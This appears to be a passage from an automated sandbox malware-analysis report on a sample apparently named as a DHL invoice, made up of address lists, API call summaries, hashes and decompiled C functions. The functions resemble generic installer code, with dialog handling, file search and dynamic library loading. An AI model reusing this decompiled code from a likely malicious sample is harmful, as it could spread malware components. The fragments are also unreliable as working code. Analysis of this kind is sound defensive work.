                                        0x73ef1e79
                                        0x73ef1e7b
                                        0x73ef1e7f
                                        0x73ef1e85
                                        0x73ef1e8b
                                        0x73ef1e8b
                                        0x73ef1e8d
                                        0x73ef1e8d
                                        0x73ef1e8e
                                        0x73ef1e8e
                                        0x73ef1e92
                                        0x73ef1e98
                                        0x73ef1e9a
                                        0x73ef1e9e
                                        0x73ef1ea3
                                        0x73ef1ea3
                                        0x73ef1ea5
                                        0x73ef1ea5
                                        0x73ef1ea8
                                        0x73ef1eab
                                        0x73ef1eb4
                                        0x73ef1eb7
                                        0x73ef1eba
                                        0x73ef1eba
                                        0x73ef1ebc
                                        0x73ef1ebf
                                        0x73ef1ec5
                                        0x73ef1ecb
                                        0x73ef1ecb
                                        0x73ef1ecd
                                        0x00000000
                                        0x00000000
                                        0x73ef1ed3
                                        0x73ef1ed3
                                        0x73ef1ed7
                                        0x73ef1ede
                                        0x73ef1f02
                                        0x73ef1f02
                                        0x73ef1f06
                                        0x73ef1f08
                                        0x73ef1f0b
                                        0x73ef1f0b
                                        0x73ef1f0e
                                        0x73ef1f0e
                                        0x00000000
                                        0x73ef1f06
                                        0x73ef1ee3
                                        0x73ef1ee6
                                        0x73ef1ee6
                                        0x73ef1eed
                                        0x73ef1eef
                                        0x73ef1ef2
                                        0x73ef1ef9
                                        0x73ef1efa
                                        0x73ef1f00
                                        0x73ef1f00
                                        0x00000000
                                        0x73ef1f00
                                        0x73ef1ef4
                                        0x73ef1ef7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x73ef1ef7
                                        0x73ef1e87
                                        0x73ef1e89
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x73ef1df5
                                        0x73ef1c9b
                                        0x73ef1c9b
                                        0x73ef1c9c
                                        0x73ef1ddb
                                        0x00000000
                                        0x73ef1ddb
                                        0x73ef1ca2
                                        0x73ef1ca3
                                        0x00000000
                                        0x00000000
                                        0x73ef1ca9
                                        0x73ef1cac
                                        0x73ef1da0
                                        0x73ef1da0
                                        0x73ef1da3
                                        0x73ef1db8
                                        0x73ef1dba
                                        0x73ef1dba
                                        0x73ef1dbb
                                        0x73ef1dbe
                                        0x73ef1dc1
                                        0x73ef1dcd
                                        0x73ef1dcd
                                        0x73ef1dcd
                                        0x73ef1dc3
                                        0x73ef1dc3
                                        0x73ef1dc3
                                        0x73ef1dd3
                                        0x00000000
                                        0x73ef1dd3
                                        0x73ef1da5
                                        0x73ef1da5
                                        0x73ef1da6
                                        0x73ef1db4
                                        0x00000000
                                        0x73ef1db4
                                        0x73ef1da9
                                        0x73ef1daa
                                        0x00000000
                                        0x00000000
                                        0x73ef1db0
                                        0x00000000
                                        0x73ef1db0
                                        0x73ef1cb2
                                        0x73ef1d9c
                                        0x00000000
                                        0x73ef1d9c
                                        0x73ef1cb8
                                        0x73ef1cb8
                                        0x73ef1cbb
                                        0x73ef1ce4
                                        0x00000000
                                        0x73ef1ce4
                                        0x73ef1cbd
                                        0x73ef1cbd
                                        0x73ef1cc0
                                        0x73ef1cda
                                        0x00000000
                                        0x73ef1cda
                                        0x73ef1cc2
                                        0x73ef1cc2
                                        0x73ef1cc5
                                        0x73ef1cd4
                                        0x00000000
                                        0x73ef1cd4
                                        0x73ef1cc8
                                        0x73ef1cc9
                                        0x00000000
                                        0x00000000
                                        0x73ef1ccb
                                        0x00000000
                                        0x73ef1b83
                                        0x73ef1b83
                                        0x73ef1b86
                                        0x00000000
                                        0x73ef1b86
                                        0x73ef1b7d
                                        0x73ef1b6b
                                        0x73ef1b6f
                                        0x00000000
                                        0x00000000
                                        0x73ef1b71
                                        0x73ef1b74
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x73ef1b74
                                        0x73ef1b05
                                        0x73ef1b08
                                        0x73ef1b3e
                                        0x73ef1b41
                                        0x00000000
                                        0x73ef1b47
                                        0x73ef1b49
                                        0x73ef1b4d
                                        0x73ef1b54
                                        0x73ef1b5b
                                        0x73ef1b5e
                                        0x73ef1b61
                                        0x00000000
                                        0x73ef1b61
                                        0x73ef1b41
                                        0x73ef1b0a
                                        0x73ef1b0b
                                        0x73ef1b26
                                        0x73ef1b29
                                        0x00000000
                                        0x73ef1b2f
                                        0x73ef1b2f
                                        0x73ef1b36
                                        0x73ef1b39
                                        0x00000000
                                        0x73ef1b39
                                        0x73ef1b29
                                        0x73ef1b10
                                        0x00000000
                                        0x73ef1b16
                                        0x73ef1b16
                                        0x73ef1b1d
                                        0x00000000
                                        0x73ef1b1d
                                        0x73ef1b10
                                        0x73ef1d09
                                        0x73ef1d0e
                                        0x73ef1d13
                                        0x73ef1d17
                                        0x73ef21c6
                                        0x73ef21cc
                                        0x73ef1d29
                                        0x73ef1d2b
                                        0x73ef1d2c
                                        0x73ef20f1
                                        0x73ef20f1
                                        0x73ef20f4
                                        0x73ef20f7
                                        0x73ef2114
                                        0x73ef211a
                                        0x73ef211c
                                        0x73ef2122
                                        0x73ef2139
                                        0x73ef2139
                                        0x73ef2139
                                        0x73ef2146
                                        0x73ef214c
                                        0x73ef214f
                                        0x73ef2155
                                        0x73ef2157
                                        0x73ef215a
                                        0x73ef215c
                                        0x73ef2163
                                        0x73ef2168
                                        0x73ef216b
                                        0x73ef216d
                                        0x73ef2172
                                        0x73ef2184
                                        0x73ef2184
                                        0x73ef2172
                                        0x73ef216b
                                        0x73ef215a
                                        0x73ef218a
                                        0x73ef218d
                                        0x73ef2197
                                        0x73ef219f
                                        0x73ef21ab
                                        0x73ef21b1
                                        0x73ef21b4
                                        0x73ef20e6
                                        0x73ef20e6
                                        0x00000000
                                        0x73ef20e6
                                        0x73ef21ba
                                        0x73ef21c0
                                        0x73ef21c0
                                        0x00000000
                                        0x00000000
                                        0x73ef21c2
                                        0x73ef21c2
                                        0x73ef21c2
                                        0x73ef21c2
                                        0x00000000
                                        0x73ef218f
                                        0x73ef218f
                                        0x73ef2195
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x73ef2195
                                        0x73ef218d
                                        0x73ef2125
                                        0x73ef212b
                                        0x73ef212d
                                        0x73ef2133
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x73ef2133
                                        0x73ef20f9
                                        0x73ef2100
                                        0x73ef2106
                                        0x73ef210c
                                        0x00000000
                                        0x73ef210c
                                        0x73ef1d32
                                        0x73ef1d33
                                        0x73ef20d0
                                        0x73ef20d0
                                        0x73ef20d6
                                        0x73ef20d9
                                        0x00000000
                                        0x00000000
                                        0x73ef20e0
                                        0x73ef20e5
                                        0x00000000
                                        0x73ef20e5
                                        0x73ef1d3a
                                        0x00000000
                                        0x00000000
                                        0x73ef1d40
                                        0x73ef1d40
                                        0x73ef1d49
                                        0x73ef1d4e
                                        0x73ef1d54
                                        0x00000000
                                        0x00000000
                                        0x73ef1d5a
                                        0x73ef1d67
                                        0x73ef1d6d
                                        0x73ef1d77
                                        0x73ef1d7d
                                        0x73ef1d85
                                        0x73ef1d95
                                        0x00000000
                                        0x73ef1d95

                                        APIs
                                          • Part of subcall function 73EF1215: GlobalAlloc.KERNELBASE(00000040,73EF1233,?,73EF12CF,-73EF404B,73EF11AB,-000000A0), ref: 73EF121D
                                        • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 73EF1BC4
                                        • lstrcpyA.KERNEL32(00000008,?), ref: 73EF1C0C
                                        • lstrcpyA.KERNEL32(00000408,?), ref: 73EF1C16
                                        • GlobalFree.KERNEL32 ref: 73EF1C29
                                        • GlobalFree.KERNEL32 ref: 73EF1D09
                                        • GlobalFree.KERNEL32 ref: 73EF1D0E
                                        • GlobalFree.KERNEL32 ref: 73EF1D13
                                        • GlobalFree.KERNEL32 ref: 73EF1EFA
                                        • lstrcpyA.KERNEL32(?,?), ref: 73EF2098
                                        • GetModuleHandleA.KERNEL32(00000008), ref: 73EF2114
                                        • LoadLibraryA.KERNEL32(00000008), ref: 73EF2125
                                        • GetProcAddress.KERNEL32(?,?), ref: 73EF217E
                                        • lstrlenA.KERNEL32(00000408), ref: 73EF2198
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.789361572.0000000073EF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 73EF0000, based on PE: true
                                        • Associated: 00000000.00000002.789352592.0000000073EF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789369353.0000000073EF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789378752.0000000073EF5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73ef0000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                        • String ID:
                                        • API String ID: 245916457-0
                                        • Opcode ID: 28567855dac08b427a1170c04cd3c7cd35fec950059275bc74bc761444e500ba
                                        • Instruction ID: 5c98d80c5ceef335bb6be4758197997b7e0075b706b18846eb6487d93af09079
                                        • Opcode Fuzzy Hash: 28567855dac08b427a1170c04cd3c7cd35fec950059275bc74bc761444e500ba
                                        • Instruction Fuzzy Hash: D9229976A0424FDFDB968FA4C8807ADBBF9FF05319F14852ED196A2280D7F49681CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 39%
                                        			E00402765(char __ebx, char* __edi, char* __esi) {
                                        				void* _t19;
                                        
                                        				if(FindFirstFileA(E00402B2C(2), _t19 - 0x1c8) != 0xffffffff) {
                                        					E00405F38(__edi, _t6);
                                        					_push(_t19 - 0x19c);
                                        					_push(__esi);
                                        					E00405FDA();
                                        				} else {
                                        					 *__edi = __ebx;
                                        					 *__esi = __ebx;
                                        					 *((intOrPtr*)(_t19 - 4)) = 1;
                                        				}
                                        				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t19 - 4));
                                        				return 0;
                                        			}




                                        0x0040277d
                                        0x00402791
                                        0x0040279c
                                        0x0040279d
                                        0x004028d6
                                        0x0040277f
                                        0x0040277f
                                        0x00402781
                                        0x00402783
                                        0x00402783
                                        0x004029bb
                                        0x004029c7

                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: 7aadfe7274229bb714756b7137abee653a08c846199b04a25fb503983604493c
                                        • Instruction ID: 2655497eb84a062ae037f6c25fa5e5de2408fe63ae01e39025771dd9bbe68540
                                        • Opcode Fuzzy Hash: 7aadfe7274229bb714756b7137abee653a08c846199b04a25fb503983604493c
                                        • Instruction Fuzzy Hash: 3BF0A0B2644101AAD701EBB49A49AEEB768EB11324F60417BE241F21C1D2BC89459B6E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E00404A6D(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                        				struct HWND__* _v8;
                                        				struct HWND__* _v12;
                                        				long _v16;
                                        				signed int _v20;
                                        				signed int _v24;
                                        				intOrPtr _v28;
                                        				signed char* _v32;
                                        				int _v36;
                                        				signed int _v44;
                                        				int _v48;
                                        				signed int* _v60;
                                        				signed char* _v64;
                                        				signed int _v68;
                                        				long _v72;
                                        				void* _v76;
                                        				intOrPtr _v80;
                                        				intOrPtr _v84;
                                        				void* _v88;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t203;
                                        				void* _t205;
                                        				intOrPtr _t206;
                                        				intOrPtr _t208;
                                        				long _t212;
                                        				signed int _t216;
                                        				signed int _t227;
                                        				void* _t230;
                                        				void* _t231;
                                        				int _t237;
                                        				long _t242;
                                        				long _t243;
                                        				signed int _t244;
                                        				signed int _t250;
                                        				signed int _t252;
                                        				signed char _t253;
                                        				signed char _t259;
                                        				void* _t264;
                                        				void* _t266;
                                        				signed char* _t284;
                                        				signed char _t285;
                                        				long _t287;
                                        				long _t290;
                                        				void* _t291;
                                        				signed int _t300;
                                        				signed int _t308;
                                        				void* _t309;
                                        				void* _t310;
                                        				signed char* _t316;
                                        				int _t320;
                                        				int _t321;
                                        				signed int* _t322;
                                        				int _t323;
                                        				long _t324;
                                        				signed int _t325;
                                        				long _t327;
                                        				int _t328;
                                        				signed int _t329;
                                        				void* _t331;
                                        
                                        				_v12 = GetDlgItem(_a4, 0x3f9);
                                        				_v8 = GetDlgItem(_a4, 0x408);
                                        				_t331 = SendMessageA;
                                        				_v24 =  *0x423748;
                                        				_v28 =  *0x423714 + 0x94;
                                        				_t320 = 0x10;
                                        				if(_a8 != 0x110) {
                                        					L23:
                                        					if(_a8 != 0x405) {
                                        						_t298 = _a16;
                                        					} else {
                                        						_a12 = 0;
                                        						_t298 = 1;
                                        						_a8 = 0x40f;
                                        						_a16 = 1;
                                        					}
                                        					if(_a8 == 0x4e || _a8 == 0x413) {
                                        						_v16 = _t298;
                                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                        							if(( *0x42371d & 0x00000002) != 0) {
                                        								L41:
                                        								if(_v16 != 0) {
                                        									_t242 = _v16;
                                        									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                        										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                        									}
                                        									_t243 = _v16;
                                        									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                        										_t298 = _v24;
                                        										_t244 =  *(_t243 + 0x5c);
                                        										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                        											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                                        										} else {
                                        											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                                        										}
                                        									}
                                        								}
                                        								goto L48;
                                        							}
                                        							if(_a8 == 0x413) {
                                        								L33:
                                        								_t298 = 0 | _a8 != 0x00000413;
                                        								_t250 = E004049BB(_v8, _a8 != 0x413);
                                        								_t325 = _t250;
                                        								if(_t325 >= 0) {
                                        									_t99 = _v24 + 8; // 0x8
                                        									_t298 = _t250 * 0x418 + _t99;
                                        									_t252 =  *_t298;
                                        									if((_t252 & 0x00000010) == 0) {
                                        										if((_t252 & 0x00000040) == 0) {
                                        											_t253 = _t252 ^ 0x00000001;
                                        										} else {
                                        											_t259 = _t252 ^ 0x00000080;
                                        											if(_t259 >= 0) {
                                        												_t253 = _t259 & 0x000000fe;
                                        											} else {
                                        												_t253 = _t259 | 0x00000001;
                                        											}
                                        										}
                                        										 *_t298 = _t253;
                                        										E0040117D(_t325);
                                        										_a12 = _t325 + 1;
                                        										_a16 =  !( *0x42371c) >> 0x00000008 & 0x00000001;
                                        										_a8 = 0x40f;
                                        									}
                                        								}
                                        								goto L41;
                                        							}
                                        							_t298 = _a16;
                                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                        								goto L41;
                                        							}
                                        							goto L33;
                                        						} else {
                                        							goto L48;
                                        						}
                                        					} else {
                                        						L48:
                                        						if(_a8 != 0x111) {
                                        							L56:
                                        							if(_a8 == 0x200) {
                                        								SendMessageA(_v8, 0x200, 0, 0);
                                        							}
                                        							if(_a8 == 0x40b) {
                                        								_t230 =  *0x41fcec; // 0x0
                                        								if(_t230 != 0) {
                                        									ImageList_Destroy(_t230);
                                        								}
                                        								_t231 =  *0x41fd00; // 0x0
                                        								if(_t231 != 0) {
                                        									GlobalFree(_t231);
                                        								}
                                        								 *0x41fcec = 0;
                                        								 *0x41fd00 = 0;
                                        								 *0x423780 = 0;
                                        							}
                                        							if(_a8 != 0x40f) {
                                        								L88:
                                        								if(_a8 == 0x420 && ( *0x42371d & 0x00000001) != 0) {
                                        									_t321 = (0 | _a16 == 0x00000020) << 3;
                                        									ShowWindow(_v8, _t321);
                                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                                        								}
                                        								goto L91;
                                        							} else {
                                        								E004011EF(_t298, 0, 0);
                                        								_t203 = _a12;
                                        								if(_t203 != 0) {
                                        									if(_t203 != 0xffffffff) {
                                        										_t203 = _t203 - 1;
                                        									}
                                        									_push(_t203);
                                        									_push(8);
                                        									E00404A3B();
                                        								}
                                        								if(_a16 == 0) {
                                        									L75:
                                        									E004011EF(_t298, 0, 0);
                                        									_t205 =  *0x41fd00; // 0x0
                                        									_v36 = _t205;
                                        									_t206 =  *0x423748;
                                        									_v64 = 0xf030;
                                        									_v24 = 0;
                                        									if( *0x42374c <= 0) {
                                        										L86:
                                        										InvalidateRect(_v8, 0, 1);
                                        										_t208 =  *0x422edc; // 0x4ebb51
                                        										if( *((intOrPtr*)(_t208 + 0x10)) != 0) {
                                        											E00404976(0x3ff, 0xfffffffb, E0040498E(5));
                                        										}
                                        										goto L88;
                                        									}
                                        									_t322 = _t206 + 8;
                                        									do {
                                        										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                        										if(_t212 != 0) {
                                        											_t300 =  *_t322;
                                        											_v72 = _t212;
                                        											_v76 = 8;
                                        											if((_t300 & 0x00000001) != 0) {
                                        												_v76 = 9;
                                        												_v60 =  &(_t322[4]);
                                        												_t322[0] = _t322[0] & 0x000000fe;
                                        											}
                                        											if((_t300 & 0x00000040) == 0) {
                                        												_t216 = (_t300 & 0x00000001) + 1;
                                        												if((_t300 & 0x00000010) != 0) {
                                        													_t216 = _t216 + 3;
                                        												}
                                        											} else {
                                        												_t216 = 3;
                                        											}
                                        											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                        											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                        											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                        										}
                                        										_v24 = _v24 + 1;
                                        										_t322 =  &(_t322[0x106]);
                                        									} while (_v24 <  *0x42374c);
                                        									goto L86;
                                        								} else {
                                        									_t323 = E004012E2( *0x41fd00);
                                        									E00401299(_t323);
                                        									_t227 = 0;
                                        									_t298 = 0;
                                        									if(_t323 <= 0) {
                                        										L74:
                                        										SendMessageA(_v12, 0x14e, _t298, 0);
                                        										_a16 = _t323;
                                        										_a8 = 0x420;
                                        										goto L75;
                                        									} else {
                                        										goto L71;
                                        									}
                                        									do {
                                        										L71:
                                        										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                        											_t298 = _t298 + 1;
                                        										}
                                        										_t227 = _t227 + 1;
                                        									} while (_t227 < _t323);
                                        									goto L74;
                                        								}
                                        							}
                                        						}
                                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                        							goto L91;
                                        						} else {
                                        							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                                        							if(_t237 == 0xffffffff) {
                                        								goto L91;
                                        							}
                                        							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                        							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                        								_t324 = 0x20;
                                        							}
                                        							E00401299(_t324);
                                        							SendMessageA(_a4, 0x420, 0, _t324);
                                        							_a12 = _a12 | 0xffffffff;
                                        							_a16 = 0;
                                        							_a8 = 0x40f;
                                        							goto L56;
                                        						}
                                        					}
                                        				} else {
                                        					_v36 = 0;
                                        					 *0x423780 = _a4;
                                        					_v20 = 2;
                                        					 *0x41fd00 = GlobalAlloc(0x40,  *0x42374c << 2);
                                        					_t264 = LoadImageA( *0x423700, 0x6e, 0, 0, 0, 0);
                                        					 *0x41fcf4 =  *0x41fcf4 | 0xffffffff;
                                        					_v16 = _t264;
                                        					 *0x41fcfc = SetWindowLongA(_v8, 0xfffffffc, E00405075);
                                        					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                        					 *0x41fcec = _t266;
                                        					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                        					SendMessageA(_v8, 0x1109, 2,  *0x41fcec);
                                        					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                        						SendMessageA(_v8, 0x111b, _t320, 0);
                                        					}
                                        					DeleteObject(_v16);
                                        					_t327 = 0;
                                        					do {
                                        						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                        						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                                        							if(_t327 != 0x20) {
                                        								_v20 = 0;
                                        							}
                                        							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E00405FFC(0, _t327, _t331, 0, _t272)), _t327);
                                        						}
                                        						_t327 = _t327 + 1;
                                        					} while (_t327 < 0x21);
                                        					_t328 = _a16;
                                        					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                        					_push(0x15);
                                        					E00404068(_a4);
                                        					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                        					_push(0x16);
                                        					E00404068(_a4);
                                        					_t329 = 0;
                                        					_v16 = 0;
                                        					if( *0x42374c <= 0) {
                                        						L19:
                                        						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                        						goto L20;
                                        					} else {
                                        						_t316 = _v24 + 8;
                                        						_v32 = _t316;
                                        						do {
                                        							_t284 =  &(_t316[0x10]);
                                        							if( *_t284 != 0) {
                                        								_v64 = _t284;
                                        								_t285 =  *_t316;
                                        								_v88 = _v16;
                                        								_t308 = 0x20;
                                        								_v84 = 0xffff0002;
                                        								_v80 = 0xd;
                                        								_v68 = _t308;
                                        								_v44 = _t329;
                                        								_v72 = _t285 & _t308;
                                        								if((_t285 & 0x00000002) == 0) {
                                        									if((_t285 & 0x00000004) == 0) {
                                        										_t287 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                        										_t309 =  *0x41fd00; // 0x0
                                        										 *(_t309 + _t329 * 4) = _t287;
                                        									} else {
                                        										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                        									}
                                        								} else {
                                        									_v80 = 0x4d;
                                        									_v48 = 1;
                                        									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                        									_t310 =  *0x41fd00; // 0x0
                                        									_v36 = 1;
                                        									 *(_t310 + _t329 * 4) = _t290;
                                        									_t291 =  *0x41fd00; // 0x0
                                        									_v16 =  *(_t291 + _t329 * 4);
                                        								}
                                        							}
                                        							_t329 = _t329 + 1;
                                        							_t316 =  &(_v32[0x418]);
                                        							_v32 = _t316;
                                        						} while (_t329 <  *0x42374c);
                                        						if(_v36 != 0) {
                                        							L20:
                                        							if(_v20 != 0) {
                                        								E0040409D(_v8);
                                        								goto L23;
                                        							} else {
                                        								ShowWindow(_v12, 5);
                                        								E0040409D(_v12);
                                        								L91:
                                        								return E004040CF(_a8, _a12, _a16);
                                        							}
                                        						}
                                        						goto L19;
                                        					}
                                        				}
                                        			}































































                                        0x00404a8b
                                        0x00404a93
                                        0x00404a9b
                                        0x00404aa1
                                        0x00404ab9
                                        0x00404abc
                                        0x00404abd
                                        0x00404cea
                                        0x00404cf1
                                        0x00404d05
                                        0x00404cf3
                                        0x00404cf5
                                        0x00404cf8
                                        0x00404cf9
                                        0x00404d00
                                        0x00404d00
                                        0x00404d11
                                        0x00404d1f
                                        0x00404d22
                                        0x00404d38
                                        0x00404dad
                                        0x00404db0
                                        0x00404db2
                                        0x00404dbc
                                        0x00404dca
                                        0x00404dca
                                        0x00404dcc
                                        0x00404dd6
                                        0x00404ddc
                                        0x00404ddf
                                        0x00404de2
                                        0x00404dfd
                                        0x00404de4
                                        0x00404dee
                                        0x00404dee
                                        0x00404de2
                                        0x00404dd6
                                        0x00000000
                                        0x00404db0
                                        0x00404d3d
                                        0x00404d48
                                        0x00404d4d
                                        0x00404d54
                                        0x00404d59
                                        0x00404d5d
                                        0x00404d68
                                        0x00404d68
                                        0x00404d6c
                                        0x00404d70
                                        0x00404d74
                                        0x00404d87
                                        0x00404d76
                                        0x00404d76
                                        0x00404d7d
                                        0x00404d83
                                        0x00404d7f
                                        0x00404d7f
                                        0x00404d7f
                                        0x00404d7d
                                        0x00404d8b
                                        0x00404d8d
                                        0x00404da0
                                        0x00404da3
                                        0x00404da6
                                        0x00404da6
                                        0x00404d70
                                        0x00000000
                                        0x00404d5d
                                        0x00404d3f
                                        0x00404d46
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404e00
                                        0x00404e00
                                        0x00404e07
                                        0x00404e78
                                        0x00404e80
                                        0x00404e88
                                        0x00404e88
                                        0x00404e91
                                        0x00404e93
                                        0x00404e9a
                                        0x00404e9d
                                        0x00404e9d
                                        0x00404ea3
                                        0x00404eaa
                                        0x00404ead
                                        0x00404ead
                                        0x00404eb3
                                        0x00404eb9
                                        0x00404ebf
                                        0x00404ebf
                                        0x00404ecc
                                        0x00405022
                                        0x00405029
                                        0x00405046
                                        0x0040504c
                                        0x0040505e
                                        0x0040505e
                                        0x00000000
                                        0x00404ed2
                                        0x00404ed4
                                        0x00404ed9
                                        0x00404ede
                                        0x00404ee3
                                        0x00404ee5
                                        0x00404ee5
                                        0x00404ee6
                                        0x00404ee7
                                        0x00404ee9
                                        0x00404ee9
                                        0x00404ef1
                                        0x00404f32
                                        0x00404f34
                                        0x00404f39
                                        0x00404f44
                                        0x00404f47
                                        0x00404f4c
                                        0x00404f53
                                        0x00404f56
                                        0x00404ff8
                                        0x00404ffe
                                        0x00405004
                                        0x0040500c
                                        0x0040501d
                                        0x0040501d
                                        0x00000000
                                        0x0040500c
                                        0x00404f5c
                                        0x00404f5f
                                        0x00404f65
                                        0x00404f6a
                                        0x00404f6c
                                        0x00404f6e
                                        0x00404f74
                                        0x00404f7b
                                        0x00404f80
                                        0x00404f87
                                        0x00404f8a
                                        0x00404f8a
                                        0x00404f91
                                        0x00404f9d
                                        0x00404fa1
                                        0x00404fa3
                                        0x00404fa3
                                        0x00404f93
                                        0x00404f95
                                        0x00404f95
                                        0x00404fc3
                                        0x00404fcf
                                        0x00404fde
                                        0x00404fde
                                        0x00404fe0
                                        0x00404fe3
                                        0x00404fec
                                        0x00000000
                                        0x00404ef3
                                        0x00404efe
                                        0x00404f01
                                        0x00404f06
                                        0x00404f08
                                        0x00404f0c
                                        0x00404f1c
                                        0x00404f26
                                        0x00404f28
                                        0x00404f2b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404f0e
                                        0x00404f0e
                                        0x00404f14
                                        0x00404f16
                                        0x00404f16
                                        0x00404f17
                                        0x00404f18
                                        0x00000000
                                        0x00404f0e
                                        0x00404ef1
                                        0x00404ecc
                                        0x00404e0f
                                        0x00000000
                                        0x00404e25
                                        0x00404e2f
                                        0x00404e34
                                        0x00000000
                                        0x00000000
                                        0x00404e46
                                        0x00404e4b
                                        0x00404e57
                                        0x00404e57
                                        0x00404e59
                                        0x00404e68
                                        0x00404e6a
                                        0x00404e6e
                                        0x00404e71
                                        0x00000000
                                        0x00404e71
                                        0x00404e0f
                                        0x00404ac3
                                        0x00404ac6
                                        0x00404ac9
                                        0x00404ad9
                                        0x00404aec
                                        0x00404af7
                                        0x00404afd
                                        0x00404b0b
                                        0x00404b1e
                                        0x00404b23
                                        0x00404b2e
                                        0x00404b37
                                        0x00404b4d
                                        0x00404b5d
                                        0x00404b69
                                        0x00404b69
                                        0x00404b6e
                                        0x00404b74
                                        0x00404b76
                                        0x00404b79
                                        0x00404b7e
                                        0x00404b83
                                        0x00404b85
                                        0x00404b85
                                        0x00404ba5
                                        0x00404ba5
                                        0x00404ba7
                                        0x00404ba8
                                        0x00404bad
                                        0x00404bb3
                                        0x00404bb7
                                        0x00404bbc
                                        0x00404bc4
                                        0x00404bc8
                                        0x00404bcd
                                        0x00404bd2
                                        0x00404bda
                                        0x00404bdd
                                        0x00404cac
                                        0x00404cbf
                                        0x00000000
                                        0x00404be3
                                        0x00404be6
                                        0x00404be9
                                        0x00404bec
                                        0x00404bec
                                        0x00404bf1
                                        0x00404bfa
                                        0x00404bfd
                                        0x00404c01
                                        0x00404c04
                                        0x00404c07
                                        0x00404c10
                                        0x00404c19
                                        0x00404c1c
                                        0x00404c1f
                                        0x00404c22
                                        0x00404c60
                                        0x00404c83
                                        0x00404c85
                                        0x00404c8b
                                        0x00404c62
                                        0x00404c71
                                        0x00404c71
                                        0x00404c24
